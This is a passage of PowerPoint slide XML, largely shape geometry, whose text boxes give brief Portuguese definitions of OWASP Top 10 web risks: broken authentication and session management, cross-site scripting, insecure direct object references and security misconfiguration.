                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5218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1795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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1" rIns="66441" bIns="48154" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="91440" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>As funções da aplicação relacionadas com autenticação e gerenciamento de sessão geralmente são implementadas de forma incorreta, permitindo que os atacantes comprometam senhas, chaves e tokens de sessão ou, ainda, explorem outra falha da implementação para assumir a identidade de outros usuários.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="1798293"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12746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a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A2 – </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>Quebra de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>Autenticação </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>e Gerenciamento de Sessão</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Freeform 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="2677749"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5218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1795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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1" rIns="66441" bIns="48154" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="91440" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>Falhas XSS o</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>correm </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>sempre que uma aplicação recebe dados não confiáveis e </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>os envia ao </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>navegador sem </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>validação </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>ou </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>filtro adequados. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>XSS permite aos atacantes executarem scripts no navegador da vítima </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>que podem </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>“sequestrar” </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>sessões do </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>usuário, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>desfigurar sites, ou </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>redirecionar o usuário para </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>sites </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>maliciosos.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="2601274"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12746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a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A3 – Cross-Site Scripting (XSS)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="3480730"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5218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1795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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2" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="91440" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>Uma referência insegura </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>e direta a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>um objeto ocorre quando um programador expõe uma referência à implementação </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>interna </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>de um </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>objeto, como um arquivo, diretório</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>ou </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>registro da base de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>dados. Sem a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>verificação </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>do controle </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>acesso </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>ou outra </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>proteção, os </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>atacantes podem manipular estas referências para </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>acessar dados não-autorizados.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="3404256"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12746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a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A4 – </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>Referência </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>Insegura e Direta a Objetos</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="4283711"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5218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1795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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2" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="91440" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>Uma boa </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>segurança </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>exige a definição de uma configuração segura e implementada </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>na aplicação, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>frameworks, servidor </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>de aplicação, servidor web, banco de dados e plataforma. Todas essas configurações devem ser definidas, implementadas e mantidas, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>já que geralmente a configuração padrão é insegura. Adicionalmente, o software deve ser mantido atualizado.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="4207237"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
